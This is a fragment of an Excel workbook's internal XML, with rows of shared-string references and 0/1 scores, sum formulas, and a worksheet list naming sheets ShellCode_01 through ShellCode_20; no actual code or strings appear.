      </c>
    </row>
    <row r="19" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A19" s="3" t="s">
        <v>273</v>
      </c>
      <c r="B19" s="3"/>
      <c r="C19" s="3"/>
      <c r="F19" s="3"/>
    </row>
    <row r="20" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A20" s="3" t="s">
        <v>274</v>
      </c>
      <c r="B20" s="3" t="s">
        <v>304</v>
      </c>
      <c r="C20" s="3" t="s">
        <v>317</v>
      </c>
      <c r="D20">
        <v>1</v>
      </c>
      <c r="E20">
        <v>1</v>
      </c>
      <c r="F20" s="3" t="s">
        <v>317</v>
      </c>
      <c r="G20">
        <v>1</v>
      </c>
      <c r="H20">
        <v>1</v>
      </c>
    </row>
    <row r="21" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A21" s="3" t="s">
        <v>275</v>
      </c>
      <c r="B21" s="3" t="s">
        <v>305</v>
      </c>
      <c r="C21" s="3" t="s">
        <v>305</v>
      </c>
      <c r="D21">
        <v>1</v>
      </c>
      <c r="E21">
        <v>1</v>
      </c>
      <c r="F21" s="3" t="s">
        <v>318</v>
      </c>
      <c r="G21">
        <v>1</v>
      </c>
      <c r="H21">
        <v>0</v>
      </c>
    </row>
    <row r="22" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A22" s="3" t="s">
        <v>276</v>
      </c>
      <c r="B22" s="3" t="s">
        <v>306</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>306</v>
      </c>
      <c r="D22">
        <v>1</v>
      </c>
      <c r="E22">
        <v>1</v>
      </c>
      <c r="F22" s="3" t="s">
        <v>306</v>
      </c>
      <c r="G22">
        <v>1</v>
      </c>
      <c r="H22">
        <v>1</v>
      </c>
    </row>
    <row r="23" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A23" s="3" t="s">
        <v>277</v>
      </c>
      <c r="B23" s="3" t="s">
        <v>307</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>307</v>
      </c>
      <c r="D23">
        <v>1</v>
      </c>
      <c r="E23">
        <v>1</v>
      </c>
      <c r="F23" s="3" t="s">
        <v>307</v>
      </c>
      <c r="G23">
        <v>1</v>
      </c>
      <c r="H23">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A24" s="3" t="s">
        <v>84</v>
      </c>
      <c r="B24" s="3" t="s">
        <v>114</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>115</v>
      </c>
      <c r="D24">
        <v>1</v>
      </c>
      <c r="E24">
        <v>0</v>
      </c>
      <c r="F24" s="3" t="s">
        <v>116</v>
      </c>
      <c r="G24">
        <v>0</v>
      </c>
      <c r="H24">
        <v>0</v>
      </c>
    </row>
    <row r="25" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A25" s="3" t="s">
        <v>278</v>
      </c>
      <c r="B25" s="3"/>
      <c r="C25" s="3"/>
      <c r="F25" s="3"/>
    </row>
    <row r="26" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A26" s="3" t="s">
        <v>279</v>
      </c>
      <c r="B26" s="3" t="s">
        <v>308</v>
      </c>
      <c r="C26" s="3" t="s">
        <v>308</v>
      </c>
      <c r="D26">
        <v>1</v>
      </c>
      <c r="E26">
        <v>1</v>
      </c>
      <c r="F26" s="3" t="s">
        <v>308</v>
      </c>
      <c r="G26">
        <v>1</v>
      </c>
      <c r="H26">
        <v>1</v>
      </c>
    </row>
    <row r="27" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A27" s="3" t="s">
        <v>280</v>
      </c>
      <c r="B27" s="3" t="s">
        <v>309</v>
      </c>
      <c r="C27" s="3" t="s">
        <v>309</v>
      </c>
      <c r="D27">
        <v>1</v>
      </c>
      <c r="E27">
        <v>1</v>
      </c>
      <c r="F27" s="3" t="s">
        <v>309</v>
      </c>
      <c r="G27">
        <v>1</v>
      </c>
      <c r="H27">
        <v>1</v>
      </c>
    </row>
    <row r="28" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A28" s="3" t="s">
        <v>281</v>
      </c>
      <c r="B28" s="3" t="s">
        <v>310</v>
      </c>
      <c r="C28" s="3" t="s">
        <v>310</v>
      </c>
      <c r="D28">
        <v>1</v>
      </c>
      <c r="E28">
        <v>1</v>
      </c>
      <c r="F28" s="3" t="s">
        <v>310</v>
      </c>
      <c r="G28">
        <v>1</v>
      </c>
      <c r="H28">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A29" s="3" t="s">
        <v>277</v>
      </c>
      <c r="B29" s="3" t="s">
        <v>307</v>
      </c>
      <c r="C29" s="3" t="s">
        <v>307</v>
      </c>
      <c r="D29">
        <v>1</v>
      </c>
      <c r="E29">
        <v>1</v>
      </c>
      <c r="F29" s="3" t="s">
        <v>307</v>
      </c>
      <c r="G29">
        <v>1</v>
      </c>
      <c r="H29">
        <v>1</v>
      </c>
    </row>
    <row r="30" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A30" s="3" t="s">
        <v>282</v>
      </c>
      <c r="B30" s="3" t="s">
        <v>311</v>
      </c>
      <c r="C30" s="3" t="s">
        <v>311</v>
      </c>
      <c r="D30">
        <v>1</v>
      </c>
      <c r="E30">
        <v>1</v>
      </c>
      <c r="F30" s="3" t="s">
        <v>311</v>
      </c>
      <c r="G30">
        <v>1</v>
      </c>
      <c r="H30">
        <v>1</v>
      </c>
    </row>
    <row r="31" spans="1:8" ht="82.8" x14ac:dyDescent="0.25">
      <c r="A31" s="3" t="s">
        <v>283</v>
      </c>
      <c r="B31" s="3"/>
      <c r="C31" s="3"/>
      <c r="F31" s="3"/>
    </row>
    <row r="32" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A32" s="3" t="s">
        <v>284</v>
      </c>
      <c r="B32" s="3" t="s">
        <v>312</v>
      </c>
      <c r="C32" s="3" t="s">
        <v>312</v>
      </c>
      <c r="D32">
        <v>1</v>
      </c>
      <c r="E32">
        <v>1</v>
      </c>
      <c r="F32" s="3" t="s">
        <v>312</v>
      </c>
      <c r="G32">
        <v>1</v>
      </c>
      <c r="H32">
        <v>1</v>
      </c>
    </row>
    <row r="33" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A33" s="3" t="s">
        <v>285</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>313</v>
      </c>
      <c r="C33" s="3" t="s">
        <v>1339</v>
      </c>
      <c r="D33">
        <v>1</v>
      </c>
      <c r="E33">
        <v>1</v>
      </c>
      <c r="F33" s="3" t="s">
        <v>313</v>
      </c>
      <c r="G33">
        <v>1</v>
      </c>
      <c r="H33">
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A34" s="3" t="s">
        <v>286</v>
      </c>
      <c r="B34" s="3"/>
      <c r="C34" s="3"/>
      <c r="F34" s="3"/>
    </row>
    <row r="35" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A35" s="3" t="s">
        <v>287</v>
      </c>
      <c r="B35" s="3"/>
      <c r="C35" s="3"/>
      <c r="F35" s="3"/>
    </row>
    <row r="36" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A36" s="3" t="s">
        <v>288</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>314</v>
      </c>
      <c r="C36" s="3" t="s">
        <v>1340</v>
      </c>
      <c r="D36">
        <v>1</v>
      </c>
      <c r="E36">
        <v>1</v>
      </c>
      <c r="F36" s="3" t="s">
        <v>314</v>
      </c>
      <c r="G36">
        <v>1</v>
      </c>
      <c r="H36">
        <v>1</v>
      </c>
    </row>
    <row r="37" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A37" s="3" t="s">
        <v>289</v>
      </c>
      <c r="B37" s="3"/>
      <c r="C37" s="3"/>
      <c r="F37" s="3"/>
    </row>
    <row r="38" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A38" s="3" t="s">
        <v>290</v>
      </c>
      <c r="B38" s="3"/>
      <c r="C38" s="3"/>
      <c r="F38" s="3"/>
    </row>
    <row r="39" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A39" s="3" t="s">
        <v>291</v>
      </c>
      <c r="B39" s="3" t="s">
        <v>315</v>
      </c>
      <c r="C39" s="3" t="s">
        <v>1341</v>
      </c>
      <c r="D39">
        <v>0</v>
      </c>
      <c r="E39">
        <v>0</v>
      </c>
      <c r="F39" s="3" t="s">
        <v>315</v>
      </c>
      <c r="G39">
        <v>1</v>
      </c>
      <c r="H39">
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:8" ht="82.8" x14ac:dyDescent="0.25">
      <c r="A40" s="3" t="s">
        <v>292</v>
      </c>
      <c r="B40" s="3"/>
      <c r="C40" s="3"/>
      <c r="F40" s="3"/>
    </row>
    <row r="41" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A41" s="3" t="s">
        <v>84</v>
      </c>
      <c r="B41" s="3" t="s">
        <v>114</v>
      </c>
      <c r="C41" s="3" t="s">
        <v>115</v>
      </c>
      <c r="D41">
        <v>1</v>
      </c>
      <c r="E41">
        <v>0</v>
      </c>
      <c r="F41" s="3" t="s">
        <v>116</v>
      </c>
      <c r="G41">
        <v>0</v>
      </c>
      <c r="H41">
        <v>0</v>
      </c>
    </row>
    <row r="42" spans="1:8" ht="55.2" x14ac:dyDescent="0.25">
      <c r="A42" s="3" t="s">
        <v>293</v>
      </c>
      <c r="B42" s="3"/>
      <c r="C42" s="3"/>
      <c r="F42" s="3"/>
    </row>
    <row r="43" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A43" s="3" t="s">
        <v>294</v>
      </c>
      <c r="B43" s="3"/>
      <c r="C43" s="3"/>
      <c r="F43" s="3"/>
    </row>
    <row r="44" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A44" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D44" s="6">
        <f>SUM(D4:D43)</f>
        <v>22</v>
      </c>
      <c r="E44" s="6">
        <f t="shared" ref="E44:H44" si="0">SUM(E4:E43)</f>
        <v>20</v>
      </c>
      <c r="F44" s="6">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="G44" s="6">
        <f t="shared" si="0"/>
        <v>24</v>
      </c>
      <c r="H44" s="6">
        <f t="shared" si="0"/>
        <v>21</v>
      </c>
    </row>
    <row r="47" spans="1:8" ht="25.2" x14ac:dyDescent="0.45">
      <c r="A47" s="25" t="s">
        <v>44</v>
      </c>
      <c r="B47" s="25"/>
      <c r="C47" s="25"/>
      <c r="D47" s="25"/>
      <c r="E47" s="25"/>
      <c r="F47" s="25"/>
      <c r="G47" s="25"/>
      <c r="H47" s="25"/>
    </row>
    <row r="48" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A48" s="4" t="s">
        <v>1</v>
      </c>
      <c r="B48" s="4" t="s">
        <v>2</v>
      </c>
      <c r="C48" s="4" t="s">
        <v>3</v>
      </c>
      <c r="D48" s="4" t="s">
        <v>5</v>
      </c>
      <c r="E48" s="4" t="s">
        <v>6</v>
      </c>
      <c r="F48" s="4" t="s">
        <v>4</v>
      </c>
      <c r="G48" s="4" t="s">
        <v>5</v>
      </c>
      <c r="H48" s="4" t="s">
        <v>6</v>
      </c>
    </row>
    <row r="49" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A49" s="3" t="s">
        <v>45</v>
      </c>
      <c r="B49" s="3" t="s">
        <v>56</v>
      </c>
      <c r="C49" s="3" t="s">
        <v>45</v>
      </c>
      <c r="D49">
        <v>1</v>
      </c>
      <c r="E49">
        <v>1</v>
      </c>
      <c r="F49" s="3" t="s">
        <v>45</v>
      </c>
      <c r="G49" s="20">
        <v>1</v>
      </c>
      <c r="H49" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="50" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A50" s="3" t="s">
        <v>46</v>
      </c>
      <c r="B50" s="3" t="s">
        <v>57</v>
      </c>
      <c r="C50" s="3" t="s">
        <v>57</v>
      </c>
      <c r="D50">
        <v>1</v>
      </c>
      <c r="E50">
        <v>1</v>
      </c>
      <c r="F50" s="3" t="s">
        <v>57</v>
      </c>
      <c r="G50" s="20">
        <v>1</v>
      </c>
      <c r="H50" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="51" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A51" s="27" t="s">
        <v>1342</v>
      </c>
      <c r="B51" s="3" t="s">
        <v>59</v>
      </c>
      <c r="C51" s="3" t="s">
        <v>1081</v>
      </c>
      <c r="D51" s="19">
        <v>1</v>
      </c>
      <c r="E51" s="19">
        <v>1</v>
      </c>
      <c r="F51" s="3" t="s">
        <v>1081</v>
      </c>
      <c r="G51" s="20">
        <v>1</v>
      </c>
      <c r="H51" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="52" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A52" s="27"/>
      <c r="B52" s="3" t="s">
        <v>1121</v>
      </c>
      <c r="C52" s="3" t="s">
        <v>1121</v>
      </c>
      <c r="D52">
        <v>1</v>
      </c>
      <c r="E52">
        <v>1</v>
      </c>
      <c r="F52" s="3" t="s">
        <v>1121</v>
      </c>
      <c r="G52" s="20">
        <v>1</v>
      </c>
      <c r="H52" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="53" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A53" s="3" t="s">
        <v>1343</v>
      </c>
      <c r="B53" s="3" t="s">
        <v>60</v>
      </c>
      <c r="C53" s="3" t="s">
        <v>1074</v>
      </c>
      <c r="D53">
        <v>1</v>
      </c>
      <c r="E53">
        <v>1</v>
      </c>
      <c r="F53" s="3" t="s">
        <v>1074</v>
      </c>
      <c r="G53" s="20">
        <v>1</v>
      </c>
      <c r="H53" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="54" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A54" s="3" t="s">
        <v>1273</v>
      </c>
      <c r="B54" s="3" t="s">
        <v>62</v>
      </c>
      <c r="C54" s="3" t="s">
        <v>62</v>
      </c>
      <c r="D54">
        <v>1</v>
      </c>
      <c r="E54">
        <v>1</v>
      </c>
      <c r="F54" s="3" t="s">
        <v>62</v>
      </c>
      <c r="G54" s="20">
        <v>1</v>
      </c>
      <c r="H54" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="55" spans="1:8" s="19" customFormat="1" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A55" s="27" t="s">
        <v>1344</v>
      </c>
      <c r="B55" s="3" t="s">
        <v>63</v>
      </c>
      <c r="C55" s="9" t="s">
        <v>1376</v>
      </c>
      <c r="D55" s="19">
        <v>1</v>
      </c>
      <c r="E55" s="19">
        <v>0</v>
      </c>
      <c r="F55" s="9" t="s">
        <v>1376</v>
      </c>
      <c r="G55" s="20">
        <v>1</v>
      </c>
      <c r="H55" s="20">
        <v>0</v>
      </c>
    </row>
    <row r="56" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A56" s="27"/>
      <c r="B56" s="3" t="s">
        <v>1374</v>
      </c>
      <c r="C56" s="3" t="s">
        <v>1375</v>
      </c>
      <c r="D56">
        <v>1</v>
      </c>
      <c r="E56">
        <v>1</v>
      </c>
      <c r="F56" s="3" t="s">
        <v>1375</v>
      </c>
      <c r="G56" s="20">
        <v>1</v>
      </c>
      <c r="H56" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="57" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A57" s="3" t="s">
        <v>1345</v>
      </c>
      <c r="B57" s="3" t="s">
        <v>1346</v>
      </c>
      <c r="C57" s="3" t="s">
        <v>1347</v>
      </c>
      <c r="D57">
        <v>1</v>
      </c>
      <c r="E57">
        <v>1</v>
      </c>
      <c r="F57" s="3" t="s">
        <v>1347</v>
      </c>
      <c r="G57" s="20">
        <v>1</v>
      </c>
      <c r="H57" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="58" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A58" s="27" t="s">
        <v>1348</v>
      </c>
      <c r="B58" s="3" t="s">
        <v>1378</v>
      </c>
      <c r="C58" s="3"/>
      <c r="D58" s="19">
        <v>0</v>
      </c>
      <c r="E58" s="19">
        <v>0</v>
      </c>
      <c r="F58" s="3"/>
      <c r="G58" s="20">
        <v>0</v>
      </c>
      <c r="H58" s="20">
        <v>0</v>
      </c>
    </row>
    <row r="59" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A59" s="27"/>
      <c r="B59" s="3" t="s">
        <v>1377</v>
      </c>
      <c r="C59" s="3" t="s">
        <v>1349</v>
      </c>
      <c r="D59">
        <v>1</v>
      </c>
      <c r="E59">
        <v>0</v>
      </c>
      <c r="F59" s="3" t="s">
        <v>1349</v>
      </c>
      <c r="G59" s="20">
        <v>1</v>
      </c>
      <c r="H59" s="20">
        <v>0</v>
      </c>
    </row>
    <row r="60" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A60" s="3" t="s">
        <v>1350</v>
      </c>
      <c r="B60" s="3" t="s">
        <v>1351</v>
      </c>
      <c r="C60" s="3" t="s">
        <v>1352</v>
      </c>
      <c r="D60">
        <v>1</v>
      </c>
      <c r="E60">
        <v>1</v>
      </c>
      <c r="F60" s="3" t="s">
        <v>1352</v>
      </c>
      <c r="G60" s="20">
        <v>1</v>
      </c>
      <c r="H60" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="61" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A61" s="3" t="s">
        <v>1353</v>
      </c>
      <c r="B61" s="3" t="s">
        <v>1354</v>
      </c>
      <c r="C61" s="3" t="s">
        <v>1354</v>
      </c>
      <c r="D61">
        <v>1</v>
      </c>
      <c r="E61">
        <v>1</v>
      </c>
      <c r="F61" s="3" t="s">
        <v>1354</v>
      </c>
      <c r="G61" s="20">
        <v>1</v>
      </c>
      <c r="H61" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="62" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A62" s="3" t="s">
        <v>1355</v>
      </c>
      <c r="B62" s="3" t="s">
        <v>1356</v>
      </c>
      <c r="C62" s="3" t="s">
        <v>1356</v>
      </c>
      <c r="D62">
        <v>1</v>
      </c>
      <c r="E62">
        <v>1</v>
      </c>
      <c r="F62" s="3" t="s">
        <v>1356</v>
      </c>
      <c r="G62" s="20">
        <v>1</v>
      </c>
      <c r="H62" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="63" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A63" s="3" t="s">
        <v>1357</v>
      </c>
      <c r="B63" s="3" t="s">
        <v>1358</v>
      </c>
      <c r="C63" s="3" t="s">
        <v>1359</v>
      </c>
      <c r="D63">
        <v>1</v>
      </c>
      <c r="E63">
        <v>1</v>
      </c>
      <c r="F63" s="3" t="s">
        <v>1359</v>
      </c>
      <c r="G63" s="20">
        <v>1</v>
      </c>
      <c r="H63" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="64" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A64" s="3" t="s">
        <v>1360</v>
      </c>
      <c r="B64" s="3" t="s">
        <v>1361</v>
      </c>
      <c r="C64" s="3" t="s">
        <v>1361</v>
      </c>
      <c r="D64">
        <v>1</v>
      </c>
      <c r="E64">
        <v>1</v>
      </c>
      <c r="F64" s="3" t="s">
        <v>1361</v>
      </c>
      <c r="G64" s="20">
        <v>1</v>
      </c>
      <c r="H64" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="65" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A65" s="3" t="s">
        <v>1362</v>
      </c>
      <c r="B65" s="3" t="s">
        <v>1363</v>
      </c>
      <c r="C65" s="3" t="s">
        <v>1364</v>
      </c>
      <c r="D65">
        <v>1</v>
      </c>
      <c r="E65">
        <v>1</v>
      </c>
      <c r="F65" s="3" t="s">
        <v>1364</v>
      </c>
      <c r="G65" s="20">
        <v>1</v>
      </c>
      <c r="H65" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="66" spans="1:8" ht="27.6" x14ac:dyDescent="0.25">
      <c r="A66" s="3" t="s">
        <v>1365</v>
      </c>
      <c r="B66" s="3" t="s">
        <v>68</v>
      </c>
      <c r="C66" s="3" t="s">
        <v>1288</v>
      </c>
      <c r="D66">
        <v>0</v>
      </c>
      <c r="E66">
        <v>0</v>
      </c>
      <c r="F66" s="3" t="s">
        <v>1288</v>
      </c>
      <c r="G66" s="20">
        <v>0</v>
      </c>
      <c r="H66" s="20">
        <v>0</v>
      </c>
    </row>
    <row r="67" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A67" s="27" t="s">
        <v>1366</v>
      </c>
      <c r="B67" s="3" t="s">
        <v>1380</v>
      </c>
      <c r="C67" s="3" t="s">
        <v>1380</v>
      </c>
      <c r="D67" s="19">
        <v>1</v>
      </c>
      <c r="E67" s="19">
        <v>1</v>
      </c>
      <c r="F67" s="3" t="s">
        <v>1380</v>
      </c>
      <c r="G67" s="20">
        <v>1</v>
      </c>
      <c r="H67" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="68" spans="1:8" ht="55.2" customHeight="1" x14ac:dyDescent="0.25">
      <c r="A68" s="27"/>
      <c r="B68" s="3" t="s">
        <v>1379</v>
      </c>
      <c r="C68" s="3" t="s">
        <v>1193</v>
      </c>
      <c r="D68">
        <v>1</v>
      </c>
      <c r="E68">
        <v>1</v>
      </c>
      <c r="F68" s="3" t="s">
        <v>1193</v>
      </c>
      <c r="G68" s="20">
        <v>1</v>
      </c>
      <c r="H68" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="69" spans="1:8" s="19" customFormat="1" x14ac:dyDescent="0.25">
      <c r="A69" s="27" t="s">
        <v>1367</v>
      </c>
      <c r="B69" s="3" t="s">
        <v>1126</v>
      </c>
      <c r="C69" s="3" t="s">
        <v>1140</v>
      </c>
      <c r="D69" s="19">
        <v>1</v>
      </c>
      <c r="E69" s="19">
        <v>1</v>
      </c>
      <c r="F69" s="3" t="s">
        <v>1140</v>
      </c>
      <c r="G69" s="20">
        <v>1</v>
      </c>
      <c r="H69" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="70" spans="1:8" x14ac:dyDescent="0.25">
      <c r="A70" s="27"/>
      <c r="B70" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="C70" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="D70">
        <v>1</v>
      </c>
      <c r="E70">
        <v>1</v>
      </c>
      <c r="F70" s="3" t="s">
        <v>1125</v>
      </c>
      <c r="G70" s="20">
        <v>1</v>
      </c>
      <c r="H70" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="71" spans="1:8" ht="96.6" x14ac:dyDescent="0.25">
      <c r="A71" s="3" t="s">
        <v>1368</v>
      </c>
      <c r="B71" s="3" t="s">
        <v>1369</v>
      </c>
      <c r="C71" s="3" t="s">
        <v>1370</v>
      </c>
      <c r="D71">
        <v>1</v>
      </c>
      <c r="E71">
        <v>1</v>
      </c>
      <c r="F71" s="3" t="s">
        <v>1370</v>
      </c>
      <c r="G71" s="20">
        <v>1</v>
      </c>
      <c r="H71" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="72" spans="1:8" ht="41.4" x14ac:dyDescent="0.25">
      <c r="A72" s="3" t="s">
        <v>1371</v>
      </c>
      <c r="B72" s="3" t="s">
        <v>1372</v>
      </c>
      <c r="C72" s="3" t="s">
        <v>1372</v>
      </c>
      <c r="D72">
        <v>1</v>
      </c>
      <c r="E72">
        <v>1</v>
      </c>
      <c r="F72" s="3" t="s">
        <v>1372</v>
      </c>
      <c r="G72" s="20">
        <v>1</v>
      </c>
      <c r="H72" s="20">
        <v>1</v>
      </c>
    </row>
    <row r="73" spans="1:8" s="6" customFormat="1" ht="17.399999999999999" x14ac:dyDescent="0.3">
      <c r="A73" s="18" t="s">
        <v>41</v>
      </c>
      <c r="D73" s="6">
        <f>SUM(D49:D72)</f>
        <v>22</v>
      </c>
      <c r="E73" s="6">
        <f t="shared" ref="E73:H73" si="1">SUM(E49:E72)</f>
        <v>20</v>
      </c>
      <c r="F73" s="6">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="G73" s="6">
        <f t="shared" si="1"/>
        <v>22</v>
      </c>
      <c r="H73" s="6">
        <f t="shared" si="1"/>
        <v>20</v>
      </c>
    </row>
    <row r="74" spans="1:8" x14ac:dyDescent="0.25">
      <c r="F74" s="19"/>
    </row>
  </sheetData>
  <mergeCells count="8">
    <mergeCell ref="A58:A59"/>
    <mergeCell ref="A67:A68"/>
    <mergeCell ref="A69:A70"/>
    <mergeCell ref="A1:H1"/>
    <mergeCell ref="A2:H2"/>
    <mergeCell ref="A47:H47"/>
    <mergeCell ref="A51:A52"/>
    <mergeCell ref="A55:A5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ShellCode_01</vt:lpstr>
      <vt:lpstr>ShellCode_02</vt:lpstr>
      <vt:lpstr>ShellCode_03</vt:lpstr>
      <vt:lpstr>ShellCode_04</vt:lpstr>
      <vt:lpstr>ShellCode_05</vt:lpstr>
      <vt:lpstr>ShellCode_06</vt:lpstr>
      <vt:lpstr>ShellCode_07</vt:lpstr>
      <vt:lpstr>ShellCode_08</vt:lpstr>
      <vt:lpstr>ShellCode_09</vt:lpstr>
      <vt:lpstr>ShellCode_10</vt:lpstr>
      <vt:lpstr>ShellCode_11</vt:lpstr>
      <vt:lpstr>ShellCode_12</vt:lpstr>
      <vt:lpstr>ShellCode_13</vt:lpstr>
      <vt:lpstr>ShellCode_14</vt:lpstr>
      <vt:lpstr>ShellCode_15</vt:lpstr>
      <vt:lpstr>ShellCode_16</vt:lpstr>
      <vt:lpstr>ShellCode_17</vt:lpstr>
      <vt:lpstr>ShellCode_18</vt:lpstr>
      <vt:lpstr>ShellCode_19</vt:lpstr>
      <vt:lpstr>ShellCode_20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yg</dc:creator>
  <cp:lastModifiedBy>yg</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:19:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-11-20T10:05:11Z</dcterms:modified>
</cp:coreProperties>
</file>